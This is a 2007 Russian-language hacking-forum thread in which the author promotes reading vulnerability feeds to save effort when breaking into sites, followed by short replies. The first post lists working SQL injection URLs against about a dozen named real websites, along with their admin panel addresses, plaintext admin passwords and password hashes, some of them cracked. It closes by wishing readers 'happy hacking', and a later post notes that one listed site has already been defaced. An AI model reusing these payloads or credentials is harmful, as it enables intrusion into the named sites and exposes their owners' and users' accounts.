Читаем bugtrack's

Тема в разделе "Статьи", создана пользователем Koller, 22 июл 2007.

  1. Koller
    Koller Guest
    Не знаю чего меня на них занесло, но не в этом суть...
    В этом маленьком обзоре я хотел бы донести до Вас только одну мысль - посещайте почаще bugtrack's (багтраки).
    Для начала дадим малюсенькое определение, bugtrack - это система учета багов...
    Другими словами это новостная лента новых багов, уязвимостей, дырок etc...
    Зачем посещать их? Затем чтоб не искать одни и те же уязвимости которые нашли уже до вас...

    Примеры подобных лент:
    1) http://www.xakep.ru/articles/hack/bugtrack.asp
    2) http://www.securitylab.ru/vulnerability/
    3) http://securityvulns.ru/

    Это одни из известных лент конечно же...
    Вообще-то не хотел писать весь этот бред, просто хотел показать на сколько полезно читать подобные ленты.

    1) http://www.securitylab.ru/vulnerability/299772.php & http://xakep.ru/post/39307/default.asp

    Примеры:

    Код:
    http://www.faithmeadow.com/store/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20%20params"having%201=1
    Админка: http://www.faithmeadow.com/store/admin/
    Пароль на админку: likelight5

    Код:
    http://spanglishtees.com/store/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20%20params"having%201=1
    Админка: http://spanglishtees.com/store/admin/
    Пароль на админку: spanglish44

    Код:
    http://www.mamohowell.com/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20%20params"having%201=1
    Админка: http://www.mamohowell.com/admin/
    Пароль на админку: lahela

    Код:
    http://www.dressesonline.com/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20%20params"having%201=1
    Админка: http://www.dressesonline.com/admin/
    Пароль на админку: Francischan_2

    Код:
    http://www.spci.com/tuckalumni/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20%20params"having%201=1
    Админка: http://www.spci.com/tuckalumni/admin/
    Пароль на админку: n0rwich

    2) http://www.securitylab.ru/vulnerability/299834.php & http://xakep.ru/post/39306/default.asp

    Примеры:

    Код:
    http://vmsis.net/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/*
    Admin:5bbff116aa528d68994894ed16eeac0d

    Код:
    http://rodpart.ru/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/*
    Admin:3a69fddd42f4555e7d0f279eb5c5d8f4(12221390)

    Код:
    http://www.steinkopf.ru/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/*
    Nobody:978a54a0d702a50a5bc052e5f134c207

    Код:
    http://www.sba.unifi.it/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/*
    Admin:7ebdff82d5cd0e6264d4e7c30af2d513 (piratato)

    Код:
    http://www.creatina.com/temp/mdpro/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/*
    tin:41cacd3c5ff0351143f5d6406b7fa411

    Код:
    http://www.borgoclub.com/portal/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/*
    Webmaster:791a47420ed8e214ee40aa2296971d86 (vofataso)

    Код:
    http://www.mecori.com/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/*
    emmanuel:73653fb5e1e0fbf4ab772fdc9ef437fe

    [end]

    Да-да...я понимаю...что настоящий тру хеккер ищет все уязвимости сам, но не за чем так напрягаться когда эти самые уязвимости успели найти до вас...не изобретайте велосипед...
    Удачного хека...
    (с) Koller​
     
    Последнее редактирование модератором: 17 авг 2007
    22 июл 2007
    3 пользователям это понравилось.
  2. f0rd
    f0rd Guest
    Koller,
    Да, Гугл и Багтраки рулили, и будут рулить :) Только вот последнее время, времени вообще нету, ни на что. Ни на форумы, ни на Багтраки.
    Нет, это не бред:)
     
    22 июл 2007
    1 человеку нравится это.
  3. Koller
    Koller Guest
    На счет того, будет ли эта связка (гугл + багтрак) рулить в будущем не уверен...потому что времена веб-уязвимостей плавно переходит на нет...разработчики поумнели...ошибок намного меньше стали допускать...
    Так что поживем, увидем...

    А на счет бреда я так выразился только потому, что не хотел писать мини-"статью", а просто хотел показать на сколько багтраки упрощают процесс взлома...

    Вот ;)

    Добавлено через 6 часов 42 минуты
    Мда... http://www.faithmeadow.com уже взломали какие-то коммунисты...
    Посмотрим как долго другие сайты продержутся...
     
    Последнее редактирование модератором: 23 июл 2007
    22 июл 2007
  4. rijy
    rijy Новичок
    Симпатии:
    33
    ошибки были, есть и будут есть) старые баги закрывают - находятся новые.
     
    28 июл 2007
  5. Koller
    Koller Guest
    То, что они будут это факт...просто уже не в том количестве...
     
    28 июл 2007
  6. MoLoToK
    MoLoToK Guest
    Статья очень полезная, багтраки всегда будут, щас количество уменьшается, но опять возрастет, так как технологии инета постепенно меняются. Вот насчёт гугла не уверен, его наверняка уже давно закрыть хотят. Уже много в инете статей о том что гугл помогает хакерам.
     
    28 июл 2007
  7. Koller
    Koller Guest
    Ну начнем с того, что это не статья вовсе...а так...небольшой очерк...
    На счет того, будут ли багтраки всегда...спорный вопрос...быть может, в скором будущем буду закрыты все паблик ленты подобного рода...ведь и этого исключать нельзя...
    А гугл тут вовсе не причём...и его не за что закрывать...за то, что он умеет находить именно то, что юзер ищет?...посему гугл будет еще долго существовать я думаю...
     
    29 июл 2007
Загрузка...